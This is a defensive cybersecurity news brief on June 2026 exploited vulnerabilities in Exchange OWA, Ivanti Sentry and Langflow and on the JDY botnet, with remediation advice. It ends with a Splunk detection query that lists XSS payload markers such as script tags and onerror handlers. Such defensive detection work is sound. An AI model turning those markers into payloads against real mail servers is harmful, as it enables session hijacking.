What is CVE-2026-42897 in Microsoft Exchange Server?

CVE-2026-42897 is a cross-site scripting vulnerability in Outlook Web Access (OWA) that has been actively exploited since at least May 14, 2026. Microsoft patched it in the June 2026 Patch Tuesday release.

How severe is the Ivanti Sentry vulnerability?

The Ivanti Sentry RCE vulnerability carries a CVSS score of 10.0 — the maximum possible. It allows unauthenticated root-level code execution on Internet-exposed mobile access gateways and is under active exploitation.

What is CVE-2026-5027 in Langflow?

CVE-2026-5027 is a path-traversal vulnerability in the Langflow AI development platform that enables unauthenticated remote code execution. Disclosed in March 2026, it is now being exploited in the wild against exposed instances.

How many zero-days were patched in June 2026 Patch Tuesday?

Microsoft patched three zero-day vulnerabilities that were already being exploited before fixes were available, including CVE-2026-42897 in Exchange Server OWA. The total release covered 206 vulnerabilities with 39 rated critical RCE.

What is the JDY botnet and its connection to Volt Typhoon?

JDY is a China-linked botnet of 1,500+ compromised SOHO routers and IoT devices associated with Volt Typhoon infrastructure. It conducts reconnaissance scanning against U.S. military and critical infrastructure targets.

Microsoft's Record 206-Patch Tuesday — 3 Exploited Zero-Days

Three exploited zero-days in a single Patch Tuesday. A CVSS 10.0 Ivanti gateway getting popped in the wild. An AI development platform handing out unauthenticated root shells. June 11 is not a slow day. Every story below has active exploitation confirmed — the common thread is that attackers are faster than patching cycles, and the gap is widening.

In the News

Microsoft Patches Record 206 Flaws — 3 Zero-Days Already Exploited

June 2026 Patch Tuesday sets a new record: 206 vulnerabilities in a single release, surpassing the previous high by a significant margin. Of those, 39 carry critical RCE ratings, and three were already being exploited in the wild before patches shipped.

The most operationally urgent of the three is CVE-2026-42897, a cross-site scripting vulnerability in Exchange Server’s Outlook Web Access interface. Evidence of exploitation dates to at least May 14 — meaning attackers had nearly a month of access to vulnerable OWA deployments before Microsoft delivered a fix. XSS in OWA is not theoretical: it enables session hijacking, credential theft via injected forms, and lateral phishing from trusted internal mail interfaces.

The sheer volume of 206 CVEs creates a triage problem that no manual process can handle efficiently. Organizations running vulnerability prioritization tooling that ingests KEV and exploit-maturity signals will surface the three exploited zero-days automatically. Everyone else is sorting a spreadsheet while attackers are already inside.

For Exchange administrators specifically: if OWA is Internet-facing and unpatched since May, assume compromise and investigate for indicators of session hijacking before applying the update. Patching alone does not remediate existing compromise.

What defenders should do: Prioritize the three exploited zero-days for immediate patching (within 72 hours, per CISA’s revised BOD timelines). For CVE-2026-42897, audit Exchange OWA logs back to May 14 for anomalous session creation or cross-origin script injection indicators.

Ivanti Sentry CVSS 10.0 RCE — Root on Mobile Gateways

A maximum-severity remote code execution vulnerability in Ivanti Sentry is under active exploitation. The flaw allows unauthenticated attackers to achieve root-level code execution on the secure mobile access gateway — no credentials, no user interaction, just network access to an exposed appliance.

This is Ivanti’s third major zero-day cycle in 2026 alone, following the Connect Secure campaign in January and the Policy Secure disclosures in March. The pattern is clear: Ivanti appliances are a persistent target, and every Internet-exposed instance is an assumption waiting to fail. A CVSS 10.0 with confirmed exploitation and no authentication requirement places this at the top of any rational triage list.

Organizations running Ivanti Sentry for mobile device management or secure remote access need to patch today or isolate the appliance from Internet access until patching is possible. Network segmentation is the compensating control — these gateways should never sit in flat network segments with access to domain controllers or identity infrastructure.

What defenders should do: Patch Ivanti Sentry immediately. If patching is delayed, remove Internet exposure and restrict access to management interfaces. Conduct a retrospective hunt for indicators of compromise on any Sentry appliance that was exposed before the patch.

Langflow AI Platform CVE-2026-5027 — Unauthenticated RCE in the Wild

CVE-2026-5027 is a path-traversal vulnerability in Langflow, an open-source platform for building AI agent workflows and LLM pipelines. The flaw requires no authentication — any Internet-exposed Langflow instance is exploitable. Disclosed in March 2026, many deployments remain unpatched, and attackers have now weaponized it.

This matters beyond the single CVE because it represents a category of risk that most organizations have not yet addressed: AI development tooling deployed by data science teams, often outside the purview of security operations, with Internet exposure that nobody audited. Langflow instances frequently have access to internal APIs, vector databases, and credential stores used by AI pipelines — making them high-value initial access points.

The path-traversal-to-RCE chain is straightforward, and exploitation at scale is trivial once scanning identifies exposed instances. Organizations building AI workflows should inventory all development platforms with network exposure and apply microsegmentation to ensure dev tooling cannot reach production data stores directly.

What defenders should do: Identify and patch all Langflow instances. If any were Internet-exposed before patching, investigate for compromise. Apply network microsegmentation to all AI development infrastructure as a baseline control.

JDY Botnet Expands to 1,500+ Devices — Scanning U.S. Military Networks

The China-linked JDY botnet — associated with Volt Typhoon operational infrastructure — has grown to over 1,500 compromised SOHO routers and IoT devices. The botnet conducts continuous port scanning and service fingerprinting against U.S. military and critical infrastructure networks.

The operational significance is the mission: reconnaissance, not payload delivery. JDY is building target packages — mapping exposed services, identifying vulnerable software versions, cataloging network topology — for future operations. This is pre-positioning, consistent with Volt Typhoon’s documented living-off-the-land approach to critical infrastructure targeting.

For organizations with SOHO devices at branch locations, unmanaged IoT, or any edge infrastructure outside centralized monitoring, the risk is dual: your devices may be botnet nodes conducting scanning on behalf of a state actor, and your networks may be targets of that scanning.

What defenders should do: Audit SOHO router firmware across all sites. Enable DNS-layer monitoring for C2 callback detection. Deploy network detection on OT/IoT segments to identify anomalous scanning behavior originating from or targeting your infrastructure.

Defender Action Items

Patch the three Microsoft zero-days within 72 hours — prioritize CVE-2026-42897 (Exchange OWA XSS) and audit OWA logs back to May 14 for session hijacking indicators
Patch or isolate Ivanti Sentry immediately — CVSS 10.0, unauthenticated root RCE, confirmed exploitation; remove Internet exposure if patching is delayed
Inventory and patch all Langflow instances — CVE-2026-5027 requires no authentication; microsegment AI dev tooling from production data stores
Audit SOHO/IoT firmware at all branch sites — JDY botnet targets unmanaged edge devices for reconnaissance; enable DNS-layer monitoring for C2 detection
Schedule FortiSandbox patching — CVE-2026-25089 (CVSS 9.1 command injection) is not yet exploited but warrants next-window attention

Detection Spotlight

Exchange OWA XSS exploitation (CVE-2026-42897) will leave traces in IIS logs where injected scripts execute in the context of authenticated OWA sessions. The following Splunk SPL query hunts for anomalous script references in OWA URL paths — a high-fidelity indicator of reflected or stored XSS exploitation attempts against Exchange.

index=iis sourcetype="iis:access"
  cs_uri_path="/owa/*"
  (cs_uri_query="*<script*" OR cs_uri_query="*javascript:*" OR cs_uri_query="*onerror=*" OR cs_uri_query="*onload=*")
| stats count by src_ip, cs_uri_path, cs_uri_query, cs_username
| where count > 1
| sort -count

This query catches both reflected XSS payloads in URL parameters and attempts to inject event handlers through OWA query strings. False positive rate is low in OWA-specific paths — legitimate OWA traffic does not contain script tags or JavaScript event handlers in URL parameters. Correlate hits with authentication logs to determine if the source IP achieved a valid session.

References

Microsoft patches record 206 flaws — The Hacker News
Ivanti Sentry max-severity RCE exploited — BleepingComputer
Langflow vulnerability exploited for RCE — SecurityWeek
Microsoft patches exploited Exchange Server vulnerability — SecurityWeek
JDY botnet expands to 1,500+ devices — The Hacker News
CISA rewrites BOD patching timelines — The Record
Ivanti, Fortinet, and SAP release patches — The Hacker News
ShinyHunters Oracle PeopleSoft campaign — BleepingComputer

Get the daily cybersecurity brief in your inbox every weekday morning — news, SE angles, and detection queries.